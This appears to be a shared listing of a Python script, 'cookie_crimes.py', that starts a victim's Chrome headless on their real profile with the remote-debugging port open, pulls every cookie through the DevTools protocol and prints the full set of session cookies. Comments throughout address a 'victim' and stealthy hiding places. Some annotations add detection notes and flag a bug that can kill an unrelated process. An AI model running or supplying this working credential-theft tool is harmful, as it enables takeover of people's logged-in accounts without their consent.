FlyFar

cookie_crimes.py

Jul 24th, 2023
  1. import os
  2. import shlex
  3. import shutil
  4. import signal
  5. import sys
  6. import time
  7.  
  8. import json
  9. import subprocess
  10.  
  11. import requests
  12. import websocket
  13.  
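def escape(s):
    """Backslash-escape the spaces in *s* for use inside a shell command string.

    Only the space character is handled; any other shell metacharacter in *s*
    passes through untouched, so this is not general shell quoting.

    Args:
        s: the path or argument to escape.

    Returns:
        *s* with every space replaced by backslash-space.
    """
    # "\\ " is the two-character sequence backslash + space. The original spelt
    # it "\ ", an invalid escape sequence that CPython evaluates to the same
    # two characters but flags with a (Syntax)Warning on newer versions.
    return s.replace(" ", "\\ ")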
  16.  
# Overview for readers of this listing: the module-level statements below build
# the command line that later starts Chrome headless, pointed at the user's own
# profile directory, with the DevTools remote-debugging port open on localhost.
# Every function further down talks to that port. From a detection standpoint,
# a Chrome process whose command line carries both --headless and
# --remote-debugging-port while using a real --user-data-dir is the high-signal
# artifact this script leaves in process-creation telemetry.

# Edit this if you want to use a profile other than the default Chrome profile. Usually the profiles are called "Profile 1" etc. To list Chrome profiles, look in the Chrome User Data Directory for your OS.
# If you don't know what this is, don't change it.
PROFILE_NAME = "Default"

# Which localhost port should Chrome's remote debugging protocol listen on temporarily?
# Nothing in this file authenticates to the port: while the headless Chrome is
# up, any local process that can reach localhost on it can issue the same CDP
# requests this script does.
REMOTE_DEBUGGING_PORT = 9222

# The words of the Ancient Language (Chrome DevTools Protocol) that summon the cookies if you dare utter them.
# A single CDP call; its reply carries every cookie Chrome holds for the
# profile as plain JSON (see gimme_those_cookies for how it is parsed).
GET_ALL_COOKIES_REQUEST = json.dumps({"id": 1, "method": "Network.getAllCookies"})

# Os-specific Chrome flags
os_flags = []

# Edit these if your victim has a wacky Chrome install.
if sys.platform.startswith("linux"):
    CHROME_CMD = "google-chrome"

    LINUX_CHROME_CMDS = ["/usr/bin/google-chrome-stable", "/usr/bin/google-chrome-beta", "/usr/bin/google-chrome"]
    # First existing candidate wins. If none exists the bare name stays and is
    # resolved via PATH by the shell when the command is run with shell=True.
    for cmd in LINUX_CHROME_CMDS:
        if os.path.isfile(cmd):
            CHROME_CMD = cmd
            break

    USER_DATA_DIR = os.path.expanduser("~/.config/google-chrome/")

elif sys.platform.startswith("darwin"):
    CHROME_CMD = "/Applications/Google Chrome.app/Contents/MacOS/Google Chrome"

    USER_DATA_DIR = os.path.expanduser("~/Library/Application Support/Google/Chrome")

    # macOS can't write crashdumps due to SIP sometimes, work around that by using a writeable dir.
    # https://stackoverflow.com/questions/49103799/running-chrome-in-headless-mode
    os_flags.append("--crash-dumps-dir=/tmp")

elif sys.platform.startswith("win"):
    CHROME_CMD = "chrome.exe"
    # Python does not expand %VAR% here; the literal is handed to the shell
    # later (shell=True), which is what expands it.
    USER_DATA_DIR = r"%LOCALAPPDATA%\Google\Chrome\User Data"

else:
    raise RuntimeError("um excuse me kind of OS is this? for real tho what is \"%s\"? y'know what i don't have to deal with this i'm outta here *car ignition noises* *driving noises* *driving noises fade away*" % sys.platform)

# Set only when a non-default profile is copied below; cleanup() reads it to
# remove the copy.
fake_user_data_dir = None
if PROFILE_NAME != "Default":
    # Sigh. Here we go.
    # Move the relevant user data dir to somewhere and point Chrome there,
    # since Chrome will always select the "Default" profile in a given directory,
    # and all Chrome profiles are in the same User Data Directory by default.

    # it's a unix system. i know this.
    if sys.platform.startswith("linux") or sys.platform.startswith("darwin"):

        # Replace "/tmp" with your own stealthy-but-writeable directory here.
        # Or don't, I'm a comment not a cop.
        tmpdir = "/tmp"
        copy = ["cp", "-r"]

    elif sys.platform.startswith("win"):
        tmpdir = "%TEMP%"
        copy = ["xcopy", "/e", "/i", "/h"]
    else:
        raise RuntimeError("sweet merciful william gates, please no more of this '%s' OS. okay? i'm very disappointed." % sys.platform)

    profile_dir = os.path.join(USER_DATA_DIR, PROFILE_NAME)

    fake_user_data_dir = os.path.join(tmpdir, "chrome")

    if not os.path.exists(fake_user_data_dir):
        os.mkdir(fake_user_data_dir)

    dest_dir = os.path.join(fake_user_data_dir, "Default")

    # Do CRAZY escaping because cp needs shell=True to read environment variables,
    # which means we have to provide the exact command line.
    # The command string is built from constants defined in this file, not
    # from external input; only spaces are escaped on POSIX (see escape()).
    if sys.platform.startswith("win"):
        clean_profile_dir = '"%s"' % profile_dir
        dest_dir = '"%s"' % dest_dir
    else:
        clean_profile_dir = escape(profile_dir)

    cmd = " ".join(
            copy + [
                clean_profile_dir,
                dest_dir
                ]
            )

    # NOTE(review): the copy is started asynchronously and nothing waits for
    # it. Forensically, this leaves a complete copy of the profile directory
    # under tmpdir/chrome until cleanup() removes it — and leaves it in place
    # if the script dies before cleanup() runs.
    subprocess.Popen(cmd, shell=True)

    USER_DATA_DIR = fake_user_data_dir

chrome_args = [
        "https://gmail.com", # Or any other URL
        "--headless",
        """--user-data-dir="{user_data_dir}" """.format(user_data_dir=USER_DATA_DIR),
        "--remote-debugging-port={remote_debugging_port}".format(remote_debugging_port=REMOTE_DEBUGGING_PORT),
        ]

# Joined into one string because summon_forbidden_protocol() runs it with
# shell=True; the Chrome path itself only has its spaces escaped.
CHROME_DEBUGGING_CMD = [escape(CHROME_CMD)] + chrome_args + os_flags
CHROME_DEBUGGING_CMD = " ".join(CHROME_DEBUGGING_CMD)
  117.  
def summon_forbidden_protocol():
    """Start headless Chrome with the DevTools port open and return its Popen.

    Runs the module-level CHROME_DEBUGGING_CMD string through the shell and
    then sleeps a fixed 3 s. That sleep is the only readiness wait: nothing
    checks that the remote-debugging port is actually listening before the
    caller queries it.

    Returns:
        The subprocess.Popen object for the launched command.
    """

    # Supress stdout and stderr from the Chrome process so it doesn't
    # pollute our cookie output, for your copy/pasting convenience.
    # Because shell=True runs the command string via the platform shell, the
    # pid on the returned object may belong to the shell rather than to Chrome
    # itself; this is presumably why cleanup() hunts for a higher PID on Linux.
    process = subprocess.Popen(CHROME_DEBUGGING_CMD,
            shell=True,
            stdout=subprocess.DEVNULL,
            stderr=subprocess.DEVNULL)

    # Hey some people have slow computers, quite possibly because of
    # all the malware you're running on them.
    time.sleep(3)
    return process
  132.  
def hit_that_secret_json_path_like_its_1997():
    """Return the webSocketDebuggerUrl of the first DevTools target.

    Issues a plain, unauthenticated HTTP GET to the /json endpoint that Chrome
    serves on REMOTE_DEBUGGING_PORT and takes the first entry of the returned
    list. The list is assumed to be non-empty (IndexError otherwise), and
    .get() yields None if that entry has no webSocketDebuggerUrl.

    Returns:
        The websocket URL string for the first target, or None.
    """
    response = requests.get("http://localhost:{port}/json".format(port=REMOTE_DEBUGGING_PORT))
    websocket_url = response.json()[0].get("webSocketDebuggerUrl")
    return websocket_url
  137.  
def gimme_those_cookies(ws_url):
    """Ask the DevTools target at *ws_url* for all cookies and return the list.

    Sends GET_ALL_COOKIES_REQUEST over the websocket and reads exactly one
    frame, which is assumed to be the reply (the response "id" is never
    compared with the request's). The returned list holds the cookie values
    in the clear as Chrome reports them for the whole profile — this is what
    makes an open remote-debugging port a credential-exposure issue rather
    than a debugging curiosity.

    Args:
        ws_url: the webSocketDebuggerUrl of a DevTools target.

    Returns:
        The "cookies" list from the CDP result object.

    Raises:
        KeyError: if the received frame carries no result.cookies (e.g. a
            CDP error object instead of a reply).
    """
    ws = websocket.create_connection(ws_url)
    ws.send(GET_ALL_COOKIES_REQUEST)
    result = ws.recv()
    ws.close()

    # Parse out the actual cookie object from the debugging protocol object.
    response = json.loads(result)
    cookies = response["result"]["cookies"]

    return cookies
  149.  
def cleanup(chrome_process):
    """Kill the Chrome started by summon_forbidden_protocol() and remove any
    profile copy made at import time.

    Args:
        chrome_process: the Popen returned by summon_forbidden_protocol().

    Reads the module global fake_user_data_dir; when it is set, the copied
    profile directory is deleted recursively.
    """

    pid = chrome_process.pid
    # Try and kill the first chrome process with a PID higher than ours.
    # NOTE(review): the `else` below is attached to the `if`, not the `for`,
    # so every pidof entry that is not higher than ours resets pid to
    # chrome_process.pid + 1. When no entry is higher, that neighbouring PID
    # is what gets SIGKILLed — possibly an unrelated process, or no process at
    # all (ProcessLookupError). For defenders, an unexplained SIGKILL of a
    # process adjacent to a headless Chrome is one observable side effect.
    if sys.platform.startswith("linux"):
        for p in map(int, sorted(subprocess.check_output(["pidof", CHROME_CMD]).split())):
            if p > chrome_process.pid:
                pid = p
                break
            else:
                pid = chrome_process.pid + 1

    # On non-Linux platforms this is chrome_process.pid, i.e. whatever
    # shell=True produced as the direct child.
    os.kill(pid, signal.SIGKILL)

    # If we copied a Profile's User Data Directory somewhere, clean it up.
    if fake_user_data_dir is not None:
        shutil.rmtree(fake_user_data_dir)
  167.  
if __name__ == "__main__":
    # Sequence: launch Chrome -> discover the websocket URL -> pull cookies ->
    # kill Chrome -> print. There is no try/finally, so if any step raises,
    # the headless Chrome (and any profile copy) is left running/on disk.
    forbidden_process = summon_forbidden_protocol()
    secret_websocket_debugging_url = hit_that_secret_json_path_like_its_1997()
    cookies = gimme_those_cookies(secret_websocket_debugging_url)

    # Sleep for a sec so we don't get "Killed" in output.
    time.sleep(1)

    cleanup(forbidden_process)

    # The full cookie set — i.e. the user's session credentials — is written
    # to stdout as plain JSON; wherever this runs, that output is the sensitive
    # artifact to account for.
    print(json.dumps(cookies,indent=4, separators=(',', ': '), sort_keys=True))